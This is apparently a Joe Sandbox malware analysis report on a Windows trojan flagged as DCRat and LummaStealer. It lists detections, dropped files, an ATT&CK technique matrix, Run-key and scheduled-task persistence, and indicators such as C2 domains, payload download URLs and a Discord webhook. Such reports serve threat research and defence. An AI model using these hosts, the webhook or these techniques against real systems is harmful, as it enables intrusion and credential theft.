Source: Yara match	File source: C:\Users\user\AppData\Local\Idle.exe, type: DROPPED
Source: Yara match	File source: C:\Windows\Speech\kdmapper.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	11 Windows Management Instrumentation	11 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	11 Input Capture	1 System Time Discovery	1 Taint Shared Content	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Native API	1 DLL Side-Loading	411 Process Injection	111 Deobfuscate/Decode Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	1 Screen Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	21 Registry Run Keys / Startup Folder	21 Registry Run Keys / Startup Folder	4 Obfuscated Files or Information	Security Account Manager	37 System Information Discovery	SMB/Windows Admin Shares	11 Input Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 Command and Scripting Interpreter	Login Hook	Login Hook	3 Software Packing	NTDS	551 Security Software Discovery	Distributed Component Object Model	3 Clipboard Data	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 PowerShell	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	241 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	132 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	241 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	411 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
NCTSgL4t0B.exe	53%	ReversingLabs	Win32.Trojan.Generic
NCTSgL4t0B.exe	100%	Avira	HEUR/AGEN.1317356

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\ndC0udATSD.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\AppData\Local\Idle.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\AntDRUzUoe.bat	100%	Avira	BAT/Delbat.C
C:\Edge\L6lFlVnd0szYUYb26bZc.vbe	100%	Avira	VBS/Runner.VPG
C:\Edge\msedge.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\CmSUPSwWTx.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\CQuHWLcS.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Users\user\AppData\Local\Temp\TkseHYIaPv.bat	100%	Avira	BAT/Delbat.C
C:\Users\user\Desktop\LAdenXtG.log	100%	Avira	TR/AVI.Agent.updqb
C:\Users\user\Desktop\BlhoAAti.log	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Idle.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\LUAEjdyP.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\MsCvKimq.log	100%	Joe Sandbox ML
C:\Edge\msedge.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\PDYwKARr.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\NDQNJGxB.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\CQuHWLcS.log	100%	Joe Sandbox ML
C:\Edge\msedge.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\AppData\Local\Idle.exe	74%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\AwpzIjFt.log	29%	ReversingLabs
C:\Users\user\Desktop\BlhoAAti.log	8%	ReversingLabs
C:\Users\user\Desktop\CQuHWLcS.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\LAdenXtG.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\LUAEjdyP.log	25%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Desktop\MsCvKimq.log	8%	ReversingLabs
C:\Users\user\Desktop\NDQNJGxB.log	8%	ReversingLabs
C:\Users\user\Desktop\NohnZlpE.log	29%	ReversingLabs
C:\Users\user\Desktop\PDYwKARr.log	25%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Desktop\WjFdZuSe.log	29%	ReversingLabs
C:\Users\user\Desktop\YlsMudWZ.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\YtKLaCEq.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\aUzlTMCV.log	8%	ReversingLabs
C:\Users\user\Desktop\dgcKDzTe.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\iZOTduyR.log	25%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Desktop\iyHbCGSC.log	25%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Desktop\onyQOgMn.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\pGvBroyE.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\sharmiXk.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\tGwZoaKl.log	29%	ReversingLabs
C:\Windows\Speech\kdmapper.exe	68%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Windows\Speech\physmeme.exe	61%	ReversingLabs	ByteCode-MSIL.Trojan.LummaStealer

Source	Detection	Scanner	Label
https://community.akamai.steamstatic.com/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://www.gstatic.cn/recaptcha/	0%	URL Reputation	safe
http://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	0%	URL Reputation	safe
https://recaptcha.net/recaptcha/;	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://login.steampowered.com/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://store.steampowered.com/legal/	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900	100%	URL Reputation	malware
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
http://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://recaptcha.net	0%	URL Reputation	safe
https://store.steampowered.com/	0%	URL Reputation	safe
https://lv.queniujq.cn	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900/inventory/	100%	URL Reputation	malware
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://checkout.steampowered.com/	0%	URL Reputation	safe
https://api.steampowered.com/	0%	URL Reputation	safe
http://store.steampowered.com/account/cookiepreferences/	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
https://store.steampowered.com/;	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900/badges	100%	URL Reputation	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
offeviablwke.site	172.67.197.40	true	true	unknown
steamcommunity.com	104.102.49.254	true	false	unknown
file.garden	188.114.96.3	true	false	unknown
fossillargeiw.shop	unknown	unknown	true	unknown
strappystyio.shop	unknown	unknown	true	unknown
tiddymarktwo.shop	unknown	unknown	true	unknown
coursedonnyre.shop	unknown	unknown	true	unknown
surveriysiop.shop	unknown	unknown	true	unknown
captainynfanw.shop	unknown	unknown	true	unknown
tearrybyiwo.shop	unknown	unknown	true	unknown
zelensky.top	unknown	unknown	true	unknown
appleboltelwk.shop	unknown	unknown	true	unknown
tendencerangej.shop	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
coursedonnyre.shop	true		unknown
https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin	false		unknown
https://offeviablwke.site/api	true		unknown
strappystyio.shop	true		unknown
tearrybyiwo.shop	true		unknown
https://steamcommunity.com/profiles/76561199724331900	true	URL Reputation: malware	unknown
https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin	false		unknown
captainynfanw.shop	true		unknown
fossillargeiw.shop	true		unknown
tiddymarktwo.shop	true		unknown
surveriysiop.shop	true		unknown
tendencerangej.shop	true		unknown
appleboltelwk.shop	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://offeviablwke.site/apiWL3	RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin6&	curl.exe, 0000000A.00000002.1305246511.0000013FD8189000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://go.mic(L	msedge.exe, 0000002A.00000002.1821903588.0000000000E0B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.mic	powershell.exe, 00000024.00000002.1852018210.000001AF6E530000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://appleboltelwk.shop:443/api	RegAsm.exe, 00000013.00000002.1365221723.0000000000E52000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/	RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/	RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.microsoft.co	powershell.exe, 00000025.00000002.1820619216.00000194D5B2C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contoso.com/License	powershell.exe, 00000024.00000002.1746420029.000001AF10071000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://osoft.co	powershell.exe, 00000025.00000002.1806078775.00000194D5928000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.binc/	curl.exe, 0000000E.00000002.1325740592.000001EBAEA08000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.gstatic.cn/recaptcha/	RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://store.steampowered.com/subscriber_agreement/	RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.1365485963.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.1365485963.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/;Persistent-AuthWWW-Au	RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://recaptcha.net/recaptcha/;	RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a	RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com:443/profiles/76561199724331900(	RegAsm.exe, 00000013.00000002.1365221723.0000000000E52000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.google.com	RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.1365485963.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.microso	powershell.exe, 00000024.00000002.1860376856.000001AF6E6B4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://zelensky.top	msedge.exe, 0000002A.00000002.1867281661.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000031.00000002.1660968191.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 00000036.00000002.1690891933.0000000002C59000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://contoso.com/	powershell.exe, 00000024.00000002.1746420029.000001AF10071000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://discord.com/api/webhooks/1247249666907701321/mhniI9J0YWG308w-rJbT6rxKaLF0IflJIgI4sGWLEdUFWwO	NCTSgL4t0B.exe	false		unknown
https://nuget.org/nuget.exe	powershell.exe, 00000024.00000002.1746420029.000001AF10071000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://auth.gg/	NCTSgL4t0B.exe	false		unknown
https://cdn.akamai.steamstatic.c	RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.binN	curl.exe, 0000000E.00000003.1325302112.000001EBAEA3A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000002.1325850619.000001EBAEA3A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1325227642.000001EBAEA39000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1325480427.000001EBAEA3A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://zelensky.top/	Idle.exe, 00000036.00000002.1690891933.0000000002C59000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://offeviablwke.site/ty	RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://zelensky.top/RequestlongpolllinuxTrafficlocalpublicUploads.php	msedge.exe, 0000002A.00000002.1867281661.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000031.00000002.1660968191.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 00000036.00000002.1690891933.0000000002C59000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://s.ytimg.com;	RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://login.steampowered.com/	RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	msedge.exe, 00000017.00000002.1525602052.0000000002BEE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.1569280985.000001AF00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1573870687.00000194BD761000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000002A.00000002.1867281661.00000000030EB000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000031.00000002.1660968191.00000000039B8000.00000004.00000800.00020000.00000000.sdmp, Idle.exe, 00000036.00000002.1690891933.0000000002C59000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin--outputC:	curl.exe, 0000000E.00000002.1325740592.000001EBAEA00000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://offeviablwke.site/le	RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/legal/	RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.1365485963.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://offeviablwke.site/	RegAsm.exe, 00000013.00000002.1365221723.0000000000E98000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.houseindustries.com/license	NCTSgL4t0B.exe	false		unknown
https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin$h	curl.exe, 0000000A.00000003.1304872515.0000013FD81BA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000003.1304773710.0000013FD81BA000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000002.1305347033.0000013FD81BA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.houseindustries.com/licenseBurbank	NCTSgL4t0B.exe	false		unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000024.00000002.1746420029.000001AF10071000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.houseindustries.comhttp://www.talleming.comHouse	NCTSgL4t0B.exe	false		unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP	RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000025.00000002.1573870687.00000194BD988000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000024.00000002.1569280985.000001AF00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1573870687.00000194BD988000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000025.00000002.1573870687.00000194BD988000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://store.steampowered.com/privacy_agreement/	RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.1365485963.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://help.steampowered.co	RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://contoso.com/Icon	powershell.exe, 00000024.00000002.1746420029.000001AF10071000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://recaptcha.net	RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://fossillargeiw.shop:443/api	RegAsm.exe, 00000013.00000002.1365221723.0000000000E52000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://offeviablwke.site:443/apip	RegAsm.exe, 00000013.00000002.1365221723.0000000000E52000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/	RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.binapi.dll	curl.exe, 0000000E.00000003.1325345916.000001EBAEA13000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1325527057.000001EBAEA16000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://lv.queniujq.cn	RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199724331900/inventory/	RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://www.youtube.com/	RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://127.0.0.1:27060	RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://github.com/Pester/Pester	powershell.exe, 00000025.00000002.1573870687.00000194BD988000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.mi	powershell.exe, 00000025.00000002.1820619216.00000194D5B2C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin--outputC:	curl.exe, 0000000A.00000002.1305246511.0000013FD8180000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.m	powershell.exe, 00000024.00000002.1852018210.000001AF6E530000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.houseindustries.com/licenseCopyright	NCTSgL4t0B.exe	false		unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg	RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000024.00000002.1569280985.000001AF00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1573870687.00000194BD988000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/recaptcha/	RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://checkout.steampowered.com/	RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://coursedonnyre.shop:443/api	RegAsm.exe, 00000013.00000002.1365221723.0000000000E52000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://offeviablwke.site/(	RegAsm.exe, 00000013.00000002.1365221723.0000000000E52000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://api.steampowered.com/	RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://store.steampowered.com/account/cookiepreferences/	RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.1365485963.0000000000EF5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000024.00000002.1569280985.000001AF00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.1573870687.00000194BD761000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/	RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/;	RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.steampowered.c	RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/profiles/76561199724331900/badges	RegAsm.exe, 00000013.00000002.1365221723.0000000000E83000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.197.40	offeviablwke.site	United States	13335	CLOUDFLARENETUS	true
188.114.96.3	file.garden	European Union	13335	CLOUDFLARENETUS	false
104.102.49.254	steamcommunity.com	United States	16625	AKAMAI-ASUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1522836
Start date and time:	2024-09-30 18:32:31 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	76
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	NCTSgL4t0B.exe renamed because original name is a hash value
Original Sample Name:	6129fb697b8d4658283864689c040b2cd65923233de7dc75f723e22b6eebc82e.exe
Detection:	MAL
Classification:	mal100.spre.troj.expl.evad.winEXE@74/64@22/4
EGA Information:	Successful, ratio: 38.5%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, schtasks.exe, svchost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Idle.exe, PID 8044 because it is empty
Execution Graph export aborted for target Idle.exe, PID 8056 because it is empty
Execution Graph export aborted for target msedge.exe, PID 1056 because it is empty
Execution Graph export aborted for target msedge.exe, PID 7576 because it is empty
Execution Graph export aborted for target msedge.exe, PID 8064 because it is empty
Execution Graph export aborted for target msedge.exe, PID 8096 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7932 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7944 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: NCTSgL4t0B.exe

Simulations

Behavior and APIs

Time	Type	Description
12:33:34	API Interceptor	4x Sleep call for process: RegAsm.exe modified
14:24:41	API Interceptor	55x Sleep call for process: powershell.exe modified
14:24:52	API Interceptor	2x Sleep call for process: msedge.exe modified
14:24:55	API Interceptor	1x Sleep call for process: Idle.exe modified
20:24:40	Task Scheduler	Run new task: Idle path: "C:\Users\user\AppData\Local\Idle.exe"
20:24:40	Task Scheduler	Run new task: IdleI path: "C:\Users\user\AppData\Local\Idle.exe"
20:24:40	Task Scheduler	Run new task: msedge path: "C:\Edge\msedge.exe"
20:24:40	Task Scheduler	Run new task: msedgem path: "C:\Edge\msedge.exe"
20:24:42	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Idle "C:\Users\user\AppData\Local\Idle.exe"
20:24:51	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run msedge "C:\Edge\msedge.exe"
20:24:59	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Idle "C:\Users\user\AppData\Local\Idle.exe"
20:25:08	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run msedge "C:\Edge\msedge.exe"
20:25:17	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run Idle "C:\Users\user\AppData\Local\Idle.exe"
20:25:25	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run msedge "C:\Edge\msedge.exe"
